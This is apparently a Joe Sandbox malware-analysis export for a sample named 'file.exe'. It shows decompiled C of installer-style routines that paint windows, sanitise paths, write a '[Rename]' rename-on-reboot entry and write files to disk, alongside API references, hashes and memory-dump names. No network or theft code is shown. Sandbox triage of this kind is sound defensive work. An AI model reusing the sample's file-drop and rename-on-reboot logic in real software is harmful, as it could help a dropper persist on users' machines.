						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x42e360, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42eb68;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042E360,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040575A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040575A() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405D2E(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c170 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e8, "%s=%s\r\n", 0x42c170, 0x42bbe8);
						_t56 = _t55 + 0x10;
						E00405A2E(_t43, 0x400, 0x42bbe8, 0x42bbe8,  *((intOrPtr*)( *0x42eb70 + 0x128)));
						_t20 = E004056E3(0x42bbe8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405658(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405658(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004056A4(_t51 + _t29, 0x42b7e8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A0C(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056E3(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c170, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x00405760
0x00405767
0x0040576b
0x00405774
0x00405778
0x004058b7
0x004058b7
0x00000000
0x004058b7
0x00405778
0x00405784
0x0040579a
0x004057c2
0x004057cd
0x004057d1
0x004057f1
0x004057f8
0x00405802
0x0040580f
0x00405814
0x00405819
0x0040581d
0x00000000
0x00000000
0x0040582c
0x0040582e
0x0040583b
0x0040583f
0x004058b0
0x004058b1
0x00000000
0x0040585b
0x00405868
0x004058cd
0x004058d4
0x0040587b
0x0040587b
0x0040587d
0x00405886
0x00405891
0x004058a3
0x004058aa
0x00000000
0x004058aa
0x004058d6
0x004058d7
0x004058dc
0x004058de
0x004058eb
0x004058eb
0x004058ef
0x00000000
0x00000000
0x00000000
0x00000000
0x004058e0
0x004058e0
0x004058e3
0x004058e6
0x004058e7
0x00000000
0x004058e0
0x00405873
0x00405878
0x00000000
0x00405878
0x0040583f
0x0040579c
0x004057a7
0x004057b0
0x004057b4
0x00000000
0x00000000
0x004057b4
0x004058c1

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNELBASE(?,?,00000000,0040313D,00000008), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?), ref: 00405D5C

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054EF,?,00000000,000000F1,?), ref: 004057A7
GetShortPathNameA.KERNEL32 ref: 004057B0
GetShortPathNameA.KERNEL32 ref: 004057CD
wsprintfA.USER32 ref: 004057EB
GetFileSize.KERNEL32(00000000,00000000,0042BBE8,C0000000,00000004,0042BBE8,?,?,?,00000000,000000F1,?), ref: 00405826
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405835
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040584B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405891
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004058A3
GlobalFree.KERNEL32 ref: 004058AA
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004058B1

Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Strings

%s=%s, xrefs: 004057E1
[Rename], xrefs: 0040585B, 0040586D

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction ID: 426fb2abaf3c2c6495405564ff4e517f65c757b77f6bed08917e1be6c8ffeb7f
Opcode Fuzzy Hash: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction Fuzzy Hash: 6341FF32606B15ABE3206B619C49F6B3A5CDF80705F004436FD05F62C2E678E8118EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C6E(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040556C(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040552A("*?|<>/\":", _t5))) == 0) {
							E004056A4(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405c70
0x00405c78
0x00405c8c
0x00405c8c
0x00405c92
0x00405c9f
0x00405c9f
0x00405ca0
0x00405ca2
0x00405ca6
0x00405ca8
0x00405cb1
0x00405cb3
0x00405ccd
0x00405cd5
0x00405cd5
0x00405cda
0x00405cdc
0x00405cde
0x00405ce2
0x00405ce3
0x00405ce6
0x00405cee
0x00405cf0
0x00405cf4
0x00000000
0x00000000
0x00405cfa
0x00405cff
0x00000000
0x00000000
0x00000000
0x00405cff
0x00405d04

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CC6
CharNextA.USER32(?,?,?,00000000), ref: 00405CD3
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CD8
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\file.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030D2,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405CE8

Strings

"C:\Users\user\Desktop\file.exe", xrefs: 00405C74
*?|<>/":, xrefs: 00405CB6
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6F, 00405CAA

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\file.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2865859367
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 3b67653c5ee308ebbdbeafcda2e7905df7fa5ba98b11233f7c0ae47683edab57
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: 0811905180CB912EFB3206245D44BB7BF89CB567A0F58447BE9C5B22C2CA7C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E25 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E25(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403e37
0x00403ecb
0x00000000
0x00403ecb
0x00403e48
0x00403e4c
0x00000000
0x00000000
0x00403e52
0x00403e5b
0x00403e5e
0x00403e5e
0x00403e64
0x00403e6a
0x00403e6a
0x00403e76
0x00403e7c
0x00403e83
0x00403e86
0x00403e89
0x00403e8b
0x00403e8b
0x00403e93
0x00403e99
0x00403e99
0x00403ea3
0x00403ea8
0x00403eab
0x00403eb0
0x00403eb3
0x00403eb3
0x00403ec3
0x00403ec3
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403E42
GetSysColor.USER32(00000000), ref: 00403E5E
SetTextColor.GDI32(?,00000000), ref: 00403E6A
SetBkMode.GDI32(?,?), ref: 00403E76
GetSysColor.USER32(?), ref: 00403E89
SetBkColor.GDI32(?,?), ref: 00403E99
DeleteObject.GDI32(?), ref: 00403EB3
CreateBrushIndirect.GDI32(?), ref: 00403EBD

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: df06335cf3b4afc37a3544ae2d30c5d34a8579c70edf0d6bae8496df32602c64
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: DC219671904709ABCB219F78DD08B4B7FF8AF00715F048A29F855E22E0D338E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040556C(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E004056C4(_t52);
				_t27 = E004056E3(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030AF(_t47);
						E0040307D(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004056A4( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040267c
0x0040267e
0x0040268a
0x0040268d
0x00402697
0x0040269b
0x0040269b
0x004026a1
0x004026ae
0x004026b6
0x004026b9
0x004026bf
0x004026cd
0x004026d2
0x004026d6
0x004026d9
0x004026e2
0x004026ee
0x004026f2
0x004026f5
0x004026ff
0x0040271e
0x00402706
0x0040270b
0x00402713
0x00402716
0x0040271b
0x0040271b
0x00402725
0x00402725
0x00402737
0x0040273e
0x00402750
0x00402750
0x00402756
0x00402756
0x00402761
0x00402762
0x00402766
0x0040276a
0x00402770
0x00402770
0x00402777
0x00402164
0x0040288e
0x0040289a

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32 ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
GlobalFree.KERNEL32 ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction ID: 62f2159171fbc9033078dd1539b67ba065abfcd1800d5973976be9d0b9eda31e
Opcode Fuzzy Hash: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction Fuzzy Hash: DE319F71C00128BBDF216FA5CD89EAE7E78EF04364F10422AF524772E0C7795D419BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404DAA Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DAA(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405A2E(0, _t39, 0x4297b8, 0x4297b8, _a4);
					}
					_t26 = lstrlenA(0x4297b8);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b8;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b8)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b8, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404db0
0x00404dbc
0x00404dbf
0x00404dc5
0x00404dd1
0x00404dd4
0x00404dd7
0x00404ddd
0x00404ddd
0x00404de3
0x00404deb
0x00404dee
0x00404e0b
0x00404e0f
0x00404e18
0x00404e18
0x00404e22
0x00404e2b
0x00404e37
0x00404e3e
0x00404e42
0x00404e45
0x00404e58
0x00404e66
0x00404e66
0x00404e6a
0x00404e6c
0x00404e6f
0x00000000
0x00404e6f
0x00404df0
0x00404df8
0x00404e00
0x00404e06
0x00000000
0x00404e06
0x00404e00
0x00404dee
0x00404e79

APIs

lstrlenA.KERNEL32(004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
lstrlenA.KERNEL32(00402FB6,004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,?,74D0EA30), ref: 00404E06
SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
SendMessageA.USER32 ref: 00404E3E
SendMessageA.USER32 ref: 00404E58
SendMessageA.USER32 ref: 00404E66

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction ID: 64f14355eea1465708e63b557f2fc924fecf56a011f776fb8de10cf69f9f2b8c
Opcode Fuzzy Hash: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction Fuzzy Hash: F7216071A00118BBDB119FA9DD85ADEBFA9FF44354F14807AF904B6290C7398E418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404679 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404679(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404687
0x00404694
0x0040469a
0x004046d8
0x004046d8
0x004046e7
0x004046ee
0x00000000
0x004046f0
0x0040469c
0x004046ab
0x004046b3
0x004046b6
0x004046c8
0x004046ce
0x004046d5
0x00000000
0x004046d5
0x00000000

APIs

SendMessageA.USER32 ref: 00404694
GetMessagePos.USER32 ref: 0040469C
ScreenToClient.USER32 ref: 004046B6
SendMessageA.USER32 ref: 004046C8
SendMessageA.USER32 ref: 004046EE

Strings

f, xrefs: 004046CA

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

